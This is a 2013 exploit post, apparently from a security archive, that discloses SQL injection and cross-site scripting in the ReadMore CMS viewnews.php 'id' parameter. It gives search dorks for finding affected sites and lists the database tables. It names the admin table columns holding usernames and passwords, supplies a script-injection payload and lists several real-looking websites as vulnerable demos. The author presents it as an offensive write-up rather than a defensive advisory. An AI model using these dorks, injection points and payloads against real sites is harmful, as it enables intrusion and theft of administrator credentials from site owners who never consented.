ReadMore CMS Multiple Vulnerability

2013.09.30
Credit: Arsan
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-89
Dork: inurl:\"/viewnews.php?newsid=\" OR intext:\"Powered By ReadMore Systems\"

#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # Exploit Title: ReadMore CMS Multiple Vulnerability # Date: 2013 29 September # Author: Arsan # Vendor Homepage: http://readmoresystems.com # Version : All Version # Tested on: Linux & Windows # Category: webapps # Google Dork: inurl:"/viewnews.php?newsid=" , intext:"Powered By ReadMore Systems" # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Exploit : # # [-] Description : # SQL Injection And XSS In (viewnews.php) Parameter "id" : # http://<server>/viewnews.php?newsid=1&id=1[SQL-Injection][XSS] # [-] Description Exploit : #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # ----------[SQL Injection] # (+) Tables Name: # tb_b_windowtype # tb_b_video # tb_b_userresponse # tb_b_templatelayout # tb_b_task # tb_b_systemsettings # tb_b_submenu # tb_b_sitehit # tb_b_shop_subcategory # tb_b_shop_category # tb_b_shop # tb_b_shippingrates # tb_b_shippingmethod # tb_b_searchhit # tb_b_re_property # tb_b_re_agent # tb_b_propertytypes # tb_b_propertystatus # tb_b_propertyoption # tb_b_profile # tb_b_pollvote_iprecord # tb_b_poll # tb_b_payment # tb_b_orders # tb_b_orderdetails # tb_b_newsrate # tb_b_newsopinion # tb_b_newsnewmember # tb_b_newsmember # tb_b_newsletter_category # tb_b_newsletter # tb_b_newscategory # tb_b_news_welcome # tb_b_news # tb_b_menusettings # tb_b_menuhit # tb_b_menu # tb_b_link_category # tb_b_link # tb_b_images # tb_b_highlightbox_general_settings # tb_b_highlightbox # tb_b_helpimages # tb_b_helpchapter # tb_b_helpbrief # tb_b_guestbook # tb_b_event # tb_b_emailsettings # tb_b_customerad_random_instory_settings # tb_b_customerad_random_instory # tb_b_customerad # tb_b_customer_category # tb_b_customer # tb_b_contents # tb_b_comments # tb_b_classicad # tb_b_classic_profile # tb_b_classic_category # tb_b_classic # tb_b_calendarsettings # tb_b_boxes_popup # tb_b_boxes # tb_b_blog_category # tb_b_blog # tb_b_apages_custompg # tb_b_advertisers_custompg # tb_b_adminprofile # tb_b_adminmenu # tb_b_adhit_random_instory # tb_b_adhit # ---------- # (+) Admin Table (tb_b_adminprofile) Columns : # mode # txt_status # accesslevel # varContact # varEmail # varPassword # varUser # intAdminId # ---------- # (+) User And Password In : varUser,0x3a,varPassword # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # ----------[XSS] # Just Insert This Code After Url : # "><script>alert(/Arsan/)</script> # Example : # http://www.valleXholiconline.com/viewnews.php?newsid=1&id=1"><script>alert(/Arsan/)</script> # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Demo : # # cowracomXnitynews.com/viewnews.php?newsid=2429&id=45[SQL-Injection][XSS] # www.valleycXoliconline.com/viewnews.php?newsid=4364&id=10[SQL-Injection][XSS] # www.nXsxpress.com/viewnews.php?newsid=9330&id=148[SQL-Injection][XSS] # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Contact Me : # # Arsan.Blackhat@gmail.com # Twitter.com/ArsanBlackhat # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # I L0ve Inj3ct0r Team #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top